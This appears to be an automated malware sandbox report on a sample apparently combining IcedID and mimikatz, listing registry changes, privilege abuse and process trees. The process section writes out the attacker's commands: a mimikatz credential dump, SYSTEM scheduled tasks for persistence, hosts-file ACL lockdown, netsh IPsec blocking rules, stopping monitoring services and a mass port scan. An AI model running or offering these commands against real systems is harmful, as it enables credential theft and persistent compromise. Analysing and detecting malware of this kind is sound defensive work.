\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bzbnzbyct.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2228 cmd.exe 264 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023cbb-6.dat nsis_installer_2 behavioral2/files/0x0011000000023cd6-15.dat nsis_installer_1 behavioral2/files/0x0011000000023cd6-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ tmyfwky.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" tmyfwky.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tmyfwky.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cmzbnyytn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cmzbnyytn.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" tmyfwky.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ tmyfwky.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ tmyfwky.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 264 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4280 schtasks.exe 3104 schtasks.exe 2408 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2128 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2128 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3116 tmyfwky.exe Token: SeDebugPrivilege 4056 tmyfwky.exe Token: SeDebugPrivilege 4368 vfshost.exe Token: SeDebugPrivilege 4780 cmzbnyytn.exe Token: SeLockMemoryPrivilege 2696 lfbpkn.exe Token: SeLockMemoryPrivilege 2696 lfbpkn.exe Token: SeDebugPrivilege 4388 cmzbnyytn.exe Token: SeDebugPrivilege 3668 cmzbnyytn.exe Token: SeDebugPrivilege 2936 cmzbnyytn.exe Token: SeDebugPrivilege 1608 cmzbnyytn.exe Token: SeDebugPrivilege 1956 cmzbnyytn.exe Token: SeDebugPrivilege 1928 cmzbnyytn.exe Token: SeDebugPrivilege 536 cmzbnyytn.exe Token: SeDebugPrivilege 3732 cmzbnyytn.exe Token: SeDebugPrivilege 1616 cmzbnyytn.exe Token: SeDebugPrivilege 1064 cmzbnyytn.exe Token: SeDebugPrivilege 3360 cmzbnyytn.exe Token: SeDebugPrivilege 4428 cmzbnyytn.exe Token: SeDebugPrivilege 244 cmzbnyytn.exe Token: SeDebugPrivilege 2620 cmzbnyytn.exe Token: SeDebugPrivilege 860 cmzbnyytn.exe Token: SeDebugPrivilege 2668 cmzbnyytn.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2128 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe 2128 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe 3116 tmyfwky.exe 3116 tmyfwky.exe 4056 tmyfwky.exe 4056 tmyfwky.exe 1124 xohudmc.exe 2712 umueiy.exe 2768 tmyfwky.exe 2768 tmyfwky.exe 4468 tmyfwky.exe 4468 tmyfwky.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2128 wrote to memory of 2228 2128 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe 83 PID 2128 wrote to memory of 2228 2128 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe 83 PID 2128 wrote to memory of 2228 2128 2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe 83 PID 2228 wrote to memory of 264 2228 cmd.exe 85 PID 2228 wrote to memory of 264 2228 cmd.exe 85 PID 2228 wrote to memory of 264 2228 cmd.exe 85 PID 2228 wrote to memory of 3116 2228 cmd.exe 87 PID 2228 wrote to memory of 3116 2228 cmd.exe 87 PID 2228 wrote to memory of 3116 2228 cmd.exe 87 PID 4056 wrote to memory of 3124 4056 tmyfwky.exe 89 PID 4056 wrote to memory of 3124 4056 tmyfwky.exe 89 PID 4056 wrote to memory of 3124 4056 tmyfwky.exe 89 PID 3124 wrote to memory of 3952 3124 cmd.exe 91 PID 3124 wrote to memory of 3952 3124 cmd.exe 91 PID 3124 wrote to memory of 3952 3124 cmd.exe 91 PID 3124 wrote to memory of 1572 3124 cmd.exe 92 PID 3124 wrote to memory of 1572 3124 cmd.exe 92 PID 3124 wrote to memory of 1572 3124 cmd.exe 92 PID 3124 wrote to memory of 4936 3124 cmd.exe 93 PID 3124 wrote to memory of 4936 3124 cmd.exe 93 PID 3124 wrote to memory of 4936 3124 cmd.exe 93 PID 3124 wrote to memory of 1608 3124 cmd.exe 94 PID 3124 wrote to memory of 1608 3124 cmd.exe 94 PID 3124 wrote to memory of 1608 3124 cmd.exe 94 PID 3124 wrote to memory of 32 3124 cmd.exe 95 PID 3124 wrote to memory of 32 3124 cmd.exe 95 PID 3124 wrote to memory of 32 3124 cmd.exe 95 PID 3124 wrote to memory of 4660 3124 cmd.exe 96 PID 3124 wrote to memory of 4660 3124 cmd.exe 96 PID 3124 wrote to memory of 4660 3124 cmd.exe 96 PID 4056 wrote to memory of 1268 4056 tmyfwky.exe 98 PID 4056 wrote to memory of 1268 4056 tmyfwky.exe 98 PID 4056 wrote to memory of 1268 4056 tmyfwky.exe 98 PID 4056 wrote to memory of 1540 4056 tmyfwky.exe 100 PID 4056 wrote to memory of 1540 4056 tmyfwky.exe 100 PID 4056 wrote to memory of 1540 4056 tmyfwky.exe 100 PID 4056 wrote to memory of 764 4056 tmyfwky.exe 102 PID 4056 wrote to memory of 764 4056 tmyfwky.exe 102 PID 4056 wrote to memory of 764 4056 tmyfwky.exe 102 PID 4056 wrote to memory of 3120 4056 tmyfwky.exe 116 PID 4056 wrote to memory of 3120 4056 tmyfwky.exe 116 PID 4056 wrote to memory of 3120 4056 tmyfwky.exe 116 PID 3120 wrote to memory of 1892 3120 cmd.exe 118 PID 3120 wrote to memory of 1892 3120 cmd.exe 118 PID 3120 wrote to memory of 1892 3120 cmd.exe 118 PID 1892 wrote to memory of 3572 1892 wpcap.exe 119 PID 1892 wrote to memory of 3572 1892 wpcap.exe 119 PID 1892 wrote to memory of 3572 1892 wpcap.exe 119 PID 3572 wrote to memory of 3004 3572 net.exe 121 PID 3572 wrote to memory of 3004 3572 net.exe 121 PID 3572 wrote to memory of 3004 3572 net.exe 121 PID 1892 wrote to memory of 2768 1892 wpcap.exe 122 PID 1892 wrote to memory of 2768 1892 wpcap.exe 122 PID 1892 wrote to memory of 2768 1892 wpcap.exe 122 PID 2768 wrote to memory of 5096 2768 net.exe 124 PID 2768 wrote to memory of 5096 2768 net.exe 124 PID 2768 wrote to memory of 5096 2768 net.exe 124 PID 1892 wrote to memory of 3864 1892 wpcap.exe 125 PID 1892 wrote to memory of 3864 1892 wpcap.exe 125 PID 1892 wrote to memory of 3864 1892 wpcap.exe 125 PID 3864 wrote to memory of 4284 3864 net.exe 127 PID 3864 wrote to memory of 4284 3864 net.exe 127 PID 3864 wrote to memory of 4284 3864 net.exe 127 PID 1892 wrote to memory of 4760 1892 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2084
-
C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-02_6c308ba5cd400432061e3712aa84362a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\cbdnbivt\tmyfwky.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:264
-
-
C:\Windows\cbdnbivt\tmyfwky.exeC:\Windows\cbdnbivt\tmyfwky.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3116
-
-
-
C:\Windows\cbdnbivt\tmyfwky.exeC:\Windows\cbdnbivt\tmyfwky.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3952
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4936
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:32
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4660
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1268
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1540
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:764
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\itcctjlje\unptrtjvi\wpcap.exeC:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:5096
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4284
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:4576
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4856 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:712
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2612
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1132 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1836
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt2⤵PID:4136
-
C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exeC:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\itcctjlje\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4292 -
C:\Windows\itcctjlje\Corporate\vfshost.exeC:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"2⤵PID:1356
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "abdndmbcd" /ru system /tr "cmd /c C:\Windows\ime\tmyfwky.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:736 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "biicucyni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\cbdnbivt\tmyfwky.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4160 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tknlleieq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\dvfzrticv\lfbpkn.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3104
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2300
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1856
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3860
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2092
-
-
